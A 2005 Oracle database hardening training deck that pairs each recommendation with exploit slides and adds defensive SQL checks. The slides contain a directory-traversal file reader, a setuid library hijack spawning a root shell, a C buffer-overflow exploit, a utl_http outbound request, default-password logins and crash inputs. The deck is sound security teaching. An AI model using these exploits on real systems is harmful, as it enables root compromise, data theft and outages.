
Page 1: Oracle Database Basic Hardening & Common Exploits

Alexander Kornbrust, 26-Sep-2005 V1.00, Red-Database-Security GmbH

IT Summerschool RWTH Aachen

Alexander Kornbrust, 26-September-2005

Page 2: Table of content

• Apply latest security patches
• X11 security
• Cleartext passwords
• File permission & settings
• Listener security
• External users
• Default passwords
• Mighty packages
• Password Verify Function
• Oracle profile
• System tablespace
• Init.ora settings

Page 3: Apply latest security patches

Latest patchsets:

• 8.1.7.4
• 9.1.0.5
• 9.2.0.6
• 9.2.0.7
• 10.1.0.2
• 10.1.0.3
• 10.1.0.4
• 10.2.0.1

Common exploits are available on the internet.

Apply the latest security patches on top of the latest patchsets.

Page 4: X11 Security

The Oracle documentation (until 10.2) recommends running the xhost + command before you start the installation.

Never use xhost + because it opens the X server to everyone.

Solution

• Make use of any access control mechanisms provided by the operating system and window system to prevent theft of workstation display contents or keystrokes
• Inform users not to use the 'xhost +' command and/or disable it
• Check for xsession files with 'xhost +' enabled and remove it
• Disable broadcast and/or indirect XDM requests for any X terminals that you don't explicitly want to support

Page 5: References for X11 Security

• Crash Course in X Windows Security (http://www.hack.gr/users/atlantis/windows.html)
• Safely Using the X Window System and "Securing X Windows" by John Fisher of CIAC

Page 6: Common Exploits for X11

• Read keyboard (see DVD: xkey.c)
• Dump X11 windows

Page 7: Cleartext Passwords

Unix history files (.bash_history/.sh_history) often contain command lines with cleartext passwords (e.g. sqlplus system/secretpw).

Solution

Edit the history files on a regular basis and remove the passwords.

Page 8: Common Exploit

Read Unix history files via utl_file or dbms_lob and directory traversal:

    DECLARE
      -- declarations are not shown on the slide; added so the block compiles
      Lob_loc  BFILE;
      Amount   INTEGER := 32767;
      Position INTEGER := 1;
      Buffer   RAW(32767);
    BEGIN
      -- the '../' sequence escapes the directory the MEDIA_DIR object points to
      Lob_loc := BFILENAME('MEDIA_DIR', '../../../.sh_history');
      DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);
      LOOP
        DBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);
        dbms_output.put_line(utl_raw.cast_to_varchar2(Buffer));
        Position := Position + Amount;
      END LOOP;
      DBMS_LOB.CLOSE (Lob_loc);
    END;
    /

Page 9: Cleartext Passwords in environment

Remove cleartext passwords from the environment. If an attacker compromises a system, he gets the passwords easily (set command).

Solution

Rewrite your scripts and never use plaintext passwords in the environment.

Page 10: Common Exploit

    http://server/fcgi-bin/echo.exe

Page 11: Common Exploit

Run an operating system command (e.g. env or set) from SQL*Plus via extproc or Java.

Page 12: Executables with s-bits

Remove s-bits from Oracle files, e.g. dbsnmp.

Solution

1. Search for files with s-bits:

    find . -type f -perm -4000 -print

2. Remove the s-bit:

    chmod -s dbsnmp

Page 13: Common Exploit (become root)

    [ora9i]$ ldd ./bin/dbsnmp
        libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 => /usr/lib/libthread.so.1
        libkstat.so.1 => /usr/lib/libkstat.so.1
        ....

Create a new library that is used by dbsnmp:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* runs when the library is loaded by the setuid dbsnmp binary */
    _init() {
        printf("PID=%i EUID=%i", getpid(), getuid());
        setuid(0);
        system("/usr/bin/ksh");
    }

Page 14: Execution Permission

Remove the execute permission for all other users from the Oracle executables. The oracle executable has an s-bit and some versions are vulnerable to a buffer overflow (exploit available via the internet).

Solution

    chmod o-x oracle

Page 15/16: Common Exploit 1

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define VER "Operation_Oracle_Owner_Ownage_Overflow_Oday Version 1.0.1"
    #define PADDING 0x90
    #define RIMSHOT 9850
    //#define BUFF 15000

    char oracle_crusher_char[] = "\x31\xc0\xb0\x01\xcd\x80";

    unsigned long retrieve_offset()
    {
        __asm__("movl %esp, %eax");
    }

    int main(int argc, char *argv[])
    {
        char Bucket[RIMSHOT];
        long badd_addr;
        short delta = 0;
        short i;

        if(argc > 1) {
            delta = atol(argv[1]);
        }

        badd_addr = retrieve_offset() - delta;

        printf("\n\n*************************************************************\n"
               "*************************************************************\n");
        printf("[-] %s\n", VER);
        printf("[-] Bug discovered and PoC developed by c0ntexhushmail.com.\n"
               "[-] --------------------------------------------------------\n"
               "[-] Fresh 0day PoC oracle && oracleO buffer overflow exploit\n"
               "[-] Offset values from 1750 - 3500 should work perfectly, k.\n"
               "[-] Run it and ltrace -o outout ./oracle_owned for goodness.\n"
               "[-] --------------------------------------------------------\n"
               "[-] gcc -Wall -o oracle_owned oracle_owned.c\n"
               "[-] --------------------------------------------------------\n"
               "[-] Usage: %s offset_value\n", argv[0]);

        for(i = 0; i < RIMSHOT; i += 4)
            *(long *) &Bucket[i] = badd_addr;

        for(i = 0; i < (RIMSHOT - strlen(oracle_crusher_char) - 100); i++)
            *(Bucket + i) = PADDING;

        memcpy(Bucket + i, oracle_crusher_char, strlen(oracle_crusher_char));

        printf("[-] Using Return address 0x%lx\n", badd_addr);
        printf("[-] Using offset value %d\n", delta);
        printf("*************************************************************\n"
               "*************************************************************\n\n");

        execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", "oracle", Bucket, NULL);

        return 0;
    }

Page 17: Remove old versions

Remove old, vulnerable executables/libraries:

• dbsnmp0
• oracle0

Solution

    rm dbsnmp0

Page 18: Check file permission

Check file and directory permissions on a regular basis.

Oracle recommends setting umask=022. The result of this setting is a world-readable export file.

Very often these (full) export files contain the entire database:

    drwxr-xr-x 2 oracle dba         512 Apr 23 09:00 .
    drwxr-xr-x 4 oracle dba         512 Apr 18  2004 ..
    -rw-r--r-- 1 oracle dba 22439264450 Aug 23 05:24 full_export.dmp

Page 19: Common Exploit

Copy dump files from the Oracle home directory:

    #johndoe> cp /home/oracle/dump/full_export.dmp ~/.

Page 20: Remove unneeded sources

Remove sources and application code from the database server to avoid leaving developer hints on the server.

Page 21: Securing TNS Listener

• Set a listener password (up to 9i Rel. 2)
• Set ADMIN_RESTRICTIONS
• Remove unneeded services

Page 22: Common Exploits

• Stop the listener via lsnrctl stop
• Change the listener.log name to .rhosts and send a specially crafted TNS packet

For details see the presentation "Listener Security".

Page 23: External (OPS$) user

For historical reasons Oracle still supports external users. These database users are authenticated by the operating system.

Anyone with access to an external O/S account (e.g. boot Linux from a boot CD) can access the database without further authentication.

To use this remotely, the init.ora parameter REMOTE_OS_AUTHENT must be TRUE.

If REMOTE_OS_AUTHENT is FALSE, external authentication is only used for trusted connections like ASO (RADIUS), Windows, …

Page 24: Common Exploit

Create different OS accounts like oracle, admin, administrator … and log in from this operating system account.
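A check for the condition described on pages 23 and 24, added here as an example and not taken from the slides: list the externally authenticated accounts and the two parameters that decide how far they can be abused. It assumes DBA views on a 9i/10g database, where DBA_USERS.PASSWORD shows the literal 'EXTERNAL' (11g and later expose an AUTHENTICATION_TYPE column instead); OPS$ADMIN is a constructed user name.

```sql
-- Which accounts are authenticated by the operating system?
-- On 9i/10g an external user carries the literal 'EXTERNAL' in the PASSWORD column.
SELECT username, account_status, created
  FROM dba_users
 WHERE password = 'EXTERNAL'
 ORDER BY username;

-- The two parameters that control the risk of these accounts:
--   os_authent_prefix : prefix (default 'OPS$') that maps an OS user name to a DB user
--   remote_os_authent : TRUE lets a remote client assert its OS user name unverified
SELECT name, value, isdefault
  FROM v$parameter
 WHERE name IN ('os_authent_prefix', 'remote_os_authent');

-- Remediation for a constructed example account OPS$ADMIN:
-- convert it to password authentication, or drop it if nobody needs it.
ALTER USER "OPS$ADMIN" IDENTIFIED BY "Replace-with-a-strong-password-1";
-- DROP USER "OPS$ADMIN" CASCADE;

-- remote_os_authent is a static parameter: the change takes effect after a restart.
ALTER SYSTEM SET remote_os_authent = FALSE SCOPE = SPFILE;
```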

Page 25: Remove Default Passwords

• outln/outln
• dbsnmp/dbsnmp
• system/manager
• sys/change_on_install
• scott/tiger

Solution - change database passwords:

    alter user outln identified by my!top112123;

The password is transferred in plaintext over the network.

Better solution in SQL*Plus:

    SQL> password outln

Or use Oracle Advanced Security (ASO).

Page 26: Common Exploit 1

Connect with a default password and escalate privileges:

    sqlplus scott/tiger@db
    sqlplus system/manager@db
    sqlplus sys/change_on_install@db
    sqlplus outln/outln@db

Page 27: Common Exploit 2

Sniff passwords with the trace file functionality:

    TRACE_FILE_SERVER=training.trc
    TRACE_DIRECTORY_SERVER=c:\temp
    TRACE_LEVEL_SERVER=SUPPORT

    SQL> alter user scott identified by tiger;
    User altered.

    [24-JUN-2005 13:11:20:527] nsprecv: 74 65 72 20 75 73 65 72 |ter.user|
    [24-JUN-2005 13:11:20:527] nsprecv: 20 73 63 6F 74 74 20 69 |.scott.i|
    [24-JUN-2005 13:11:20:527] nsprecv: 64 65 6E 74 69 66 69 65 |dentifie|
    [24-JUN-2005 13:11:20:527] nsprecv: 64 20 62 79 20 74 69 67 |d.by.tig|
    [24-JUN-2005 13:11:20:527] nsprecv: 65 72 01 00 00 00 01 00 |er......|

Page 28: Common Exploit 2

Sniff passwords with ethereal.

Page 29: Sanitize Connect and Resource Role

Sanitize the default Oracle roles (up to 10.1.x) CONNECT and RESOURCE.

Connect:
• ALTER SESSION
• CREATE CLUSTER
• CREATE DATABASE LINK
• CREATE SEQUENCE
• CREATE SESSION
• CREATE SYNONYM
• CREATE TABLE
• CREATE VIEW

Resource:
• CREATE CLUSTER
• CREATE INDEXTYPE
• CREATE OPERATOR
• CREATE PROCEDURE
• CREATE SEQUENCE
• CREATE TABLE
• CREATE TRIGGER
• CREATE TYPE

Page 30: Common Exploit

Crash the database with a bug in the create database link:SQL> create database link crash using 'iasdb11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd11111111111';2 3*Error in line 1:ORA-03113: end-of-file on communication channel
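To sanitize the roles from page 29 and take away the CREATE DATABASE LINK privilege that the crash on page 30 relies on, an added example (not from the slides): see who holds the two roles, what they actually create, and replace the roles with a minimal one. app_connect and app_user are constructed names; run it as a DBA.

```sql
-- Who still holds the two fat default roles (excluding the DBA's own accounts)?
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('CONNECT', 'RESOURCE')
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA')
 ORDER BY grantee;

-- Which CREATE privileges are really used? An object type that never appears
-- for a schema is a privilege that schema can live without.
SELECT owner, object_type, COUNT(*) AS objects
  FROM dba_objects
 WHERE owner IN (SELECT grantee FROM dba_role_privs
                  WHERE granted_role IN ('CONNECT', 'RESOURCE'))
   AND object_type IN ('TABLE', 'VIEW', 'SEQUENCE', 'SYNONYM', 'PROCEDURE',
                       'TRIGGER', 'TYPE', 'CLUSTER', 'DATABASE LINK')
 GROUP BY owner, object_type
 ORDER BY owner, object_type;

-- A minimal replacement role for application accounts (constructed name app_connect)
CREATE ROLE app_connect;
GRANT create session TO app_connect;

-- Swap the roles for a constructed application user app_user
GRANT app_connect TO app_user;
REVOKE connect, resource FROM app_user;
-- granting RESOURCE also granted UNLIMITED TABLESPACE as a separate system
-- privilege; revoking the role does not take it back, so revoke it explicitly
REVOKE unlimited tablespace FROM app_user;
ALTER USER app_user QUOTA 100M ON users;
-- then grant back only what the application really creates, e.g.
-- GRANT create table, create procedure TO app_user;
```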

Page 31: Password Verify Function

Use a password verify function and assign this function to all profiles.

Solution

Modify and install the password verification function UTLPWDMG.sql and assign this function to the default profile:

    SQL> alter profile default limit password_verify_function verify_function;
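A verify function in the shape the slide asks for, written here as an added example rather than Oracle's UTLPWDMG.sql: it enforces length, rejects the user name and the default passwords from page 25, requires letters and digits, and demands three changed characters. The signature (username, password, old_password) is the one Oracle expects; the function has to be created in the SYS schema, and verify_function_rds is a constructed name.

```sql
CREATE OR REPLACE FUNCTION verify_function_rds (
    username     VARCHAR2,
    password     VARCHAR2,
    old_password VARCHAR2
) RETURN BOOLEAN IS
    has_digit  BOOLEAN := FALSE;
    has_letter BOOLEAN := FALSE;
    differ     INTEGER := 0;
    c          VARCHAR2(1);
BEGIN
    -- 1. minimum length
    IF LENGTH(password) < 8 THEN
        raise_application_error(-20001, 'Password must be at least 8 characters long');
    END IF;

    -- 2. the password must not be, or contain, the user name
    IF INSTR(UPPER(password), UPPER(username)) > 0 THEN
        raise_application_error(-20002, 'Password must not contain the user name');
    END IF;

    -- 3. reject the well-known defaults from page 25 plus a few common ones
    IF LOWER(password) IN ('manager', 'change_on_install', 'tiger', 'outln',
                           'dbsnmp', 'oracle', 'password', 'welcome') THEN
        raise_application_error(-20003, 'Password is a well-known default');
    END IF;

    -- 4. at least one letter and one digit (character loop, so it also runs on 8i/9i)
    FOR i IN 1 .. LENGTH(password) LOOP
        c := SUBSTR(password, i, 1);
        IF INSTR('0123456789', c) > 0 THEN
            has_digit := TRUE;
        ELSIF INSTR('abcdefghijklmnopqrstuvwxyz', LOWER(c)) > 0 THEN
            has_letter := TRUE;
        END IF;
    END LOOP;
    IF NOT (has_digit AND has_letter) THEN
        raise_application_error(-20004, 'Password must contain letters and digits');
    END IF;

    -- 5. the new password must differ from the old one in at least 3 positions
    --    (old_password is NULL when a DBA sets the password with ALTER USER)
    IF old_password IS NOT NULL THEN
        FOR i IN 1 .. LEAST(LENGTH(password), LENGTH(old_password)) LOOP
            IF SUBSTR(password, i, 1) <> SUBSTR(old_password, i, 1) THEN
                differ := differ + 1;
            END IF;
        END LOOP;
        differ := differ + ABS(LENGTH(password) - LENGTH(old_password));
        IF differ < 3 THEN
            raise_application_error(-20005, 'Password differs too little from the old one');
        END IF;
    END IF;

    RETURN TRUE;
END verify_function_rds;
/

-- Attach it to the DEFAULT profile; profiles whose limit is DEFAULT inherit it.
ALTER PROFILE default LIMIT PASSWORD_VERIFY_FUNCTION verify_function_rds;

-- Profiles that override the setting with no function at all ('NULL') escape the check.
SELECT profile, limit
  FROM dba_profiles
 WHERE resource_name = 'PASSWORD_VERIFY_FUNCTION'
 ORDER BY profile;
```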

Page 32: Enable Auditing for SYS and normal users

It is not possible to audit SYS in 8i and lower.

Solution

• audit session;
• audit create user;
• set audit_sys_operations (init.ora/pfile) to TRUE and restart the database

Page 33: Remove Public Grants from mighty packages

• utl_http
• utl_smtp
• utl_tcp
• utl_file
• utl_inaddr
• dbms_lob
• dbms_export_extension
• dbms_sql

Also remove mighty packages reachable via database links.
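The check-and-revoke sequence for this slide's package list, added here as an example and not from the original deck: find the remaining PUBLIC grants, find out which application objects depend on them before pulling the grant, revoke, and re-grant directly where needed. Run as SYS; app_owner is a constructed schema name, and the revokes should be tried on a non-production copy first because some Oracle-supplied schemas need individual re-grants.

```sql
-- Which of the packages from the slide are still executable by PUBLIC?
SELECT table_name AS package_name, grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND table_name IN ('UTL_HTTP', 'UTL_SMTP', 'UTL_TCP', 'UTL_FILE', 'UTL_INADDR',
                      'DBMS_LOB', 'DBMS_EXPORT_EXTENSION', 'DBMS_SQL')
 ORDER BY table_name;

-- Before revoking: which non-SYS objects reference them? Their owners need an
-- explicit GRANT EXECUTE afterwards instead of the blanket PUBLIC grant.
SELECT owner, name, type, referenced_name
  FROM dba_dependencies
 WHERE referenced_owner = 'SYS'
   AND referenced_name IN ('UTL_HTTP', 'UTL_SMTP', 'UTL_TCP', 'UTL_FILE', 'UTL_INADDR',
                           'DBMS_LOB', 'DBMS_EXPORT_EXTENSION', 'DBMS_SQL')
   AND owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY owner, name;

-- Revoke the PUBLIC grants (run as SYS)
REVOKE EXECUTE ON sys.utl_http FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_smtp FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_tcp FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_file FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_inaddr FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_lob FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_export_extension FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_sql FROM PUBLIC;

-- Grant back only to the schema that really needs a package (constructed example)
GRANT EXECUTE ON sys.utl_http TO app_owner;

-- Objects left INVALID by the revoke show up here; recompile them after re-granting
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE status = 'INVALID'
   AND owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY owner, object_name;
```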

Page 34: Common Exploit 1

Many versions of Oracle utl_file and dbms_lob are vulnerable to directory traversal. Everybody with an Oracle account can read every file on the database server:

    DECLARE
      -- declarations are not shown on the slide; added so the block compiles
      Lob_loc  BFILE;
      Amount   INTEGER := 32767;
      Position INTEGER := 1;
      Buffer   RAW(32767);
    BEGIN
      Lob_loc := BFILENAME('MEDIA_DIR', 'myfile.txt');
      DBMS_LOB.OPEN (Lob_loc, DBMS_LOB.LOB_READONLY);
      LOOP
        DBMS_LOB.READ (Lob_loc, Amount, Position, Buffer);
        dbms_output.put_line(utl_raw.cast_to_varchar2(Buffer));
        Position := Position + Amount;
      END LOOP;
      DBMS_LOB.CLOSE (Lob_loc);
    END;
    /

Page 35: Common Exploit 2

Send information to an external website:

    SET serveroutput ON SIZE 40000
    DECLARE
      req   utl_http.req;
      resp  utl_http.resp;
      value VARCHAR2(1024);
    BEGIN
      utl_http.set_proxy('172.20.96.10:8080');
      req := utl_http.begin_request('http://www.heise.de');
      utl_http.set_header(req, 'User-Agent', 'Mozilla/4.0');
      resp := utl_http.get_response(req);
      LOOP
        utl_http.read_line(resp, value, TRUE);
        dbms_output.put_line(value);
      END LOOP;
      utl_http.end_response(resp);
    EXCEPTION
      WHEN utl_http.end_of_body THEN
        utl_http.end_response(resp);
    END;
    /

Other options: send information via DNS.

Page 36: Brute Force Attacks

Modify the profile for Oracle users to prevent brute force and denial of service attacks.

Solution

    SQL> ALTER PROFILE default LIMIT
           FAILED_LOGIN_ATTEMPTS 5
           PASSWORD_VERIFY_FUNCTION verify_func
           PASSWORD_LOCK_TIME 1/48
           PASSWORD_GRACE_TIME 10;

Page 37: Common Exploits

• Brute force Oracle user accounts
• D.o.S. via concurrent users (to reach the limit "processes"). Create 300 (if processes=300) concurrent sessions:

    oracle@raclinux1:~> sqlplus scott/tiger
    SQL*Plus: Release 9.0.2.6 - Production
    Copyright (c) 1982, 2003, Oracle. All rights reserved.

    ERROR:
    ORA-00020: maximum number of processes (%s) exceeded

Page 38: SYSTEM tablespace

Check if the SYSTEM tablespace is used by users other than SYS/SYSTEM.

Page 39: Common Exploit

Fill the SYSTEM tablespace with garbage.
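The check for pages 38 and 39, added here as an example (not from the slides): find accounts that default to SYSTEM, accounts with a quota or the UNLIMITED TABLESPACE privilege that lets them fill it, and application segments already sitting there. app_user is a constructed user name; the fix assumes a USERS and a TEMP tablespace exist.

```sql
-- Accounts whose default or temporary tablespace is SYSTEM
SELECT username, default_tablespace, temporary_tablespace
  FROM dba_users
 WHERE (default_tablespace = 'SYSTEM' OR temporary_tablespace = 'SYSTEM')
   AND username NOT IN ('SYS', 'SYSTEM');

-- Accounts with a quota on SYSTEM (max_bytes = -1 means unlimited)
SELECT username, tablespace_name, bytes, max_bytes
  FROM dba_ts_quotas
 WHERE tablespace_name = 'SYSTEM'
   AND username NOT IN ('SYS', 'SYSTEM');

-- Quotas are bypassed by anyone holding UNLIMITED TABLESPACE (it comes with RESOURCE)
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'UNLIMITED TABLESPACE'
   AND grantee NOT IN ('SYS', 'SYSTEM', 'DBA');

-- Application segments that already live in SYSTEM
SELECT owner, segment_name, segment_type, ROUND(bytes / 1024 / 1024) AS mb
  FROM dba_segments
 WHERE tablespace_name = 'SYSTEM'
   AND owner NOT IN ('SYS', 'SYSTEM', 'OUTLN')
 ORDER BY bytes DESC;

-- Fix for a constructed application user app_user: move it off SYSTEM and take
-- away both the quota and the blanket privilege. Existing segments still have to
-- be relocated (ALTER TABLE ... MOVE TABLESPACE users / ALTER INDEX ... REBUILD).
ALTER USER app_user
  DEFAULT TABLESPACE users
  TEMPORARY TABLESPACE temp
  QUOTA 0 ON system;
REVOKE unlimited tablespace FROM app_user;
```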

Page 40: Init.ora settings

Check if O7_DICTIONARY_ACCESSIBILITY is set to FALSE.

Solution: set O7_DICTIONARY_ACCESSIBILITY to FALSE.

Check if SQL92_SECURITY is set to TRUE.

Solution: set SQL92_SECURITY to TRUE.

Page 41: Common Exploit

Read any data dictionary table if the privilege "SELECT ANY TABLE" is granted (and O7_DICTIONARY_ACCESSIBILITY is still TRUE).

Page 42: Init.ora settings

Check that MAX_DUMP_FILE_SIZE is not set to unlimited.

Solution

• Good partition/file system design (trace and dump files on a separate partition)
• Set MAX_DUMP_FILE_SIZE in the init.ora
• alter session set max_dump_file_size=64M;

Page 43: Common Exploit

An attacker could create a large dump file and fill the partition.
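One query that checks all the init.ora settings from pages 40 to 43 (plus REMOTE_OS_AUTHENT from page 23 and AUDIT_SYS_OPERATIONS from page 32) against their expected values, followed by the corrections; added here as an example, not from the slides. The ALTER SYSTEM statements assume an spfile (9i or later); with a text init.ora, edit the file instead.

```sql
-- Running values versus the expected ones. ISDEFAULT shows whether anyone set
-- the parameter explicitly; a default value can still be the wrong one.
SELECT p.name, p.value, p.isdefault,
       CASE
         WHEN p.name = 'o7_dictionary_accessibility' AND UPPER(p.value) = 'FALSE'     THEN 'ok'
         WHEN p.name = 'sql92_security'              AND UPPER(p.value) = 'TRUE'      THEN 'ok'
         WHEN p.name = 'remote_os_authent'           AND UPPER(p.value) = 'FALSE'     THEN 'ok'
         WHEN p.name = 'audit_sys_operations'        AND UPPER(p.value) = 'TRUE'      THEN 'ok'
         WHEN p.name = 'max_dump_file_size'          AND UPPER(p.value) <> 'UNLIMITED' THEN 'ok'
         ELSE 'CHECK'
       END AS verdict
  FROM v$parameter p
 WHERE p.name IN ('o7_dictionary_accessibility', 'sql92_security', 'remote_os_authent',
                  'audit_sys_operations', 'max_dump_file_size')
 ORDER BY p.name;

-- These four are static: written to the spfile now, effective after the next restart
ALTER SYSTEM SET o7_dictionary_accessibility = FALSE SCOPE = SPFILE;
ALTER SYSTEM SET sql92_security = TRUE SCOPE = SPFILE;
ALTER SYSTEM SET remote_os_authent = FALSE SCOPE = SPFILE;
ALTER SYSTEM SET audit_sys_operations = TRUE SCOPE = SPFILE;

-- MAX_DUMP_FILE_SIZE is dynamic: cap it instance-wide and persist the value
ALTER SYSTEM SET max_dump_file_size = '64M' SCOPE = BOTH;
```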

Page 44: Exercise

Page 45: Contact

Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany

Phone: +49 (0)6821 - 95 17 637
Fax: +49 (0)6821 - 91 27 354
E-Mail: [email protected]